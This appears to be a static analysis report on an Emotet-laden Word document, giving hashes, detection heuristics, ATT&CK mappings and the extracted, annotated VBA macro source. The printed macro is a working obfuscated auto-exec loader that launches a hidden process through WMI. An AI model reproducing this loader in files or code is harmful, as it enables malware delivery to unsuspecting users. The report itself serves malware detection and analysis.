Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 626b76832c929a86…

MALICIOUS

Office (OLE)

124.9 KB Created: 2019-05-22 06:53:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 3ce00fa0dedcd127135bb8585e333dc4 SHA-1: 52cd591d7e911ceafd8b4954fd93c2b8207ea22a SHA-256: 626b76832c929a86747ae5d2a08d4d36e2bacb5927202003a122713e0af4295c
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, and ClamAV identifies it as Emotet. The VBA macro uses GetObject and Shell execution, indicating it's designed to download and execute a second-stage payload. The presence of an AutoOpen macro further supports its malicious intent.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3816 bytes
SHA-256: c66ff62d045cf33957334afcf5c35a01423cacf09bad1c786ff8902559de5ecc
Preview script
First 1,000 lines of the extracted script
' Document-class module "woOnJRqH" (VB_Base = "1Normal.ThisDocument"; VB_PredeclaredId = True
' makes it addressable by name from other modules). No procedure code is recovered for it in
' this preview; its role is to host the two MSForms TextBox controls declared at the end of
' this attribute block, which iaEZC7 reads as woOnJRqH.Iivkld and woOnJRqH.LM2Pc1.
Attribute VB_Name = "woOnJRqH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Form controls: their contents are concatenated into the command line passed to .Create in
' iaEZC7 (presumably via the control's default text property — confirm against the form data).
' Because that text is stored in the form, not in the macro source, the full command string is
' not recoverable from this listing alone; this is the shape the obfuscated-loader heuristic keys on.
Attribute VB_Control = "LM2Pc1, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Iivkld, 1, 1, MSForms, TextBox"

' Module "Sqs5zV": holds the auto-exec entry point (autoopen), the WMI launcher (iaEZC7)
' and the string wrapper (Aa11cU) that follow.
Attribute VB_Name = "Sqs5zV"
' Decoy procedure: not referenced by any other procedure visible in this listing, and every
' statement is a Debug.Print of string literals, which only writes to the VBE Immediate window.
' The numeric/alphanumeric literals carry no data used elsewhere; treat as padding that inflates
' the source and dilutes keyword-based scanning.
Sub jTwuqo()
   Debug.Print "545" + ("20") + ("HutlAa" + ("259" + "252") + "PJaFNS" + ("zZsNKP"))
Debug.Print "408" + ("836") + ("dzhWzP8j" + ("891" + "849") + "a6sK89oF" + ("oYBDm8k"))
Debug.Print "472" + ("194") + ("XqLn8XL" + ("133" + "695") + "DF5wf_T" + ("m1EAIV"))
   Debug.Print "912" + ("948") + ("jVEZ771" + ("533" + "112") + "HVPdI4" + ("DFocqM"))
Debug.Print "108" + ("714") + ("m6MTZ8n" + ("379" + "886") + "zA3RnQNl" + ("TCsZV_"))
Debug.Print "896" + ("397") + ("KRJXh_17" + ("298" + "845") + "wbHEwKC7" + ("XJW4i6"))
End Sub
' Auto-exec entry point: a procedure named autoopen (VBA names are case-insensitive) runs when
' the document is opened with macros enabled. The declaration is split over three lines with
' line-continuation characters, so the token "Sub autoopen(" never appears on one line —
' presumably to defeat single-line pattern matching on the source (the p-code still contains it,
' which is what the OLE_VBA_PCODE_AUTOEXEC_EXEC finding reports).
' The only statement that matters is the bare call to iaEZC7 in the middle; the six Debug.Print
' lines around it are decoys of the same kind as in jTwuqo.
Sub _
autoopen( _
)
   Debug.Print "743" + ("6") + ("Kj14dGI" + ("504" + "410") + "kEUc2D" + ("zzTPmT"))
Debug.Print "38" + ("879") + ("ElGJ7k" + ("307" + "609") + "QR_M5E_6" + ("ntzsrm5R"))
Debug.Print "222" + ("571") + ("sMUVBj" + ("137" + "734") + "lG0qzG" + ("QIbjiWw"))
' Real work happens here.
iaEZC7
   Debug.Print "106" + ("713") + ("PGJ50a" + ("327" + "960") + "jDA1w2j" + ("S8Faon"))
Debug.Print "519" + ("936") + ("IAIbok" + ("146" + "818") + "EjZCYUSC" + ("iU_iJINq"))
Debug.Print "516" + ("274") + ("ipffinX" + ("251" + "624") + "OFwiCC" + ("YF_o1Al"))
End Sub
' Launcher called from autoopen. Four non-decoy statements: two GetObject calls on strings built
' by Aa11cU, a ShowWindow assignment, and a .Create call whose first argument is the command
' line. The literal fragments "wInmGmts:Wi" + "n32_Processstartup" and "WinmGmts:Wi" +
' "n32_Process" read as WMI monikers ("winmgmts:Win32_ProcessStartup", "winmgmts:Win32_Process"),
' split mid-word so the whole moniker never appears as one literal. That resolution holds only
' if Aa11cU's prefix/suffix (qvwqb9vV, PW3btSuO — not defined in this listing) are empty; confirm.
Sub iaEZC7()
   Debug.Print "103" + ("124") + ("Lu3ZzU" + ("803" + "713") + "vw8dwrfp" + ("vu08Lz"))
Debug.Print "416" + ("962") + ("jDfTqD" + ("626" + "751") + "AwDIzfM" + ("ZUc3OR"))
Debug.Print "485" + ("763") + ("A61AjR" + ("871" + "306") + "mEu76KJr" + ("jm93O_"))
' First object: presumably a Win32_ProcessStartup instance (see fragments above). Note the
' nested Aa11cU call — the inner result is wrapped a second time by the outer call.
Set l2qCThC3 = GetObject(Aa11cU("wInmGmts:Wi" + Aa11cU("n32_Processstartup")))
   Debug.Print "214" + ("903") + ("uAVdL_6" + ("766" + "256") + "E5CYTcDv" + ("fCVqi9Kb"))
Debug.Print "441" + ("818") + ("EdM3Bz" + ("377" + "275") + "RFMlwBVz" + ("ocS0Az"))
Debug.Print "697" + ("37") + ("qVQ4zkL" + ("455" + "426") + "RsqsPi4" + ("Eppiao"))
' 149149 - 149149 evaluates to 0, written as an arithmetic expression over line continuations so
' the literal 0 does not appear. On a Win32_ProcessStartup object ShowWindow = 0 requests a
' hidden window for the created process (SW_HIDE) — detection/logging should not rely on a
' visible console here.
l2qCThC3. _
ShowWindow = 149149 _
- 149149
   Debug.Print "789" + ("958") + ("zF8Tf5n" + ("953" + "313") + "fz4SL1to" + ("dWGt1T"))
Debug.Print "72" + ("877") + ("aS1AjOzi" + ("909" + "182") + "PWiNb5G" + ("Q8jYu2"))
Debug.Print "585" + ("657") + ("DWMUU93" + ("775" + "951") + "mvbKDv" + ("tLwC2MV"))
' Second object: presumably the Win32_Process class, used below for its Create method.
Set kT0uWO = GetObject(Aa11cU("WinmGmts:Wi" + Aa11cU("n32_Process")))
   Debug.Print "615" + ("147") + ("FT32kPO" + ("708" + "743") + "fTIlCl" + ("IFsWPp"))
Debug.Print "419" + ("325") + ("Tf1Z34" + ("258" + "957") + "uqaOw6v_" + ("GXcFET"))
Debug.Print "408" + ("940") + ("I6iiWZ" + ("341" + "207") + "RFKUKi" + ("cU5aYpB"))
' Process creation. The command line is assembled from variables not defined anywhere in this
' listing (RidTUPq0, sZkiiqrC, vko7YS), the literal fragment "pOwe", and the two form TextBoxes
' woOnJRqH.Iivkld / woOnJRqH.LM2Pc1 (declared as VB_Control in module woOnJRqH). Only the
' "pOwe" fragment is visible; the rest of the command must be recovered from the form data.
' Remaining arguments (b5jVWl35, n6pLWz) are also undefined here; l2qCThC3 supplies the hidden-
' window startup settings. Parent-process telemetry (Word spawning via WMI rather than a
' direct child) is the observable side effect to hunt for.
kT0uWO.Create RidTUPq0 + Aa11cU("pOwe") + sZkiiqrC + woOnJRqH.Iivkld + woOnJRqH.LM2Pc1 + vko7YS, b5jVWl35, l2qCThC3, n6pLWz
   Debug.Print "670" + ("239") + ("ljcFhC" + ("225" + "701") + "DpTz0m" + ("hqliUuA"))
Debug.Print "110" + ("437") + ("oQn_pz" + ("32" + "979") + "zAYP9pE" + ("GfiGlJr"))
Debug.Print "164" + ("193") + ("VlAkru" + ("449" + "658") + "wni_rp" + ("SF7S1G"))
End Sub
' String wrapper used by every GetObject / Create argument in iaEZC7.
' Returns qvwqb9vV + rw7tnH + PW3btSuO. Neither qvwqb9vV nor PW3btSuO is declared or assigned in
' the visible source and no Option Explicit is shown; if they are simply undeclared they are
' Empty and the concatenation reduces to rw7tnH unchanged (i.e. the function is an identity
' wrapper that exists to separate the caller's literal from the sink). If they are defined in
' another module (P8sS27 follows this one, its body is outside this preview), they may add a
' prefix/suffix the caller strips later — confirm before assuming the monikers in iaEZC7 are exact.
' The Debug.Print lines are decoys as in the other procedures.
Function Aa11cU(rw7tnH)
   Debug.Print "57" + ("132") + ("pAoaClG" + ("833" + "105") + "ffOEjBRj" + ("Fsuo_h"))
Debug.Print "989" + ("223") + ("ObKkGsi" + ("797" + "739") + "hiF6nA1" + ("ojhbqS"))
Debug.Print "904" + ("784") + ("Fm5IfK" + ("331" + "654") + "Zi1SidNp" + ("bJ__ut6"))
' Only effective statement: return value = prefix + argument + suffix.
Aa11cU = qvwqb9vV + rw7tnH + PW3btSuO
   Debug.Print "386" + ("426") + ("JDlXqE" + ("633" + "949") + "qEcbBnB" + ("t7RfXj"))
Debug.Print "590" + ("103") + ("VSWMjYof" + ("756" + "800") + "zA64hP" + ("zjAPmR5j"))
Debug.Print "217" + ("809") + ("TEYRd37C" + ("373" + "118") + "vp7QlfC" + ("O72RGk"))
End Function


Attribute VB_Name = "P8sS27"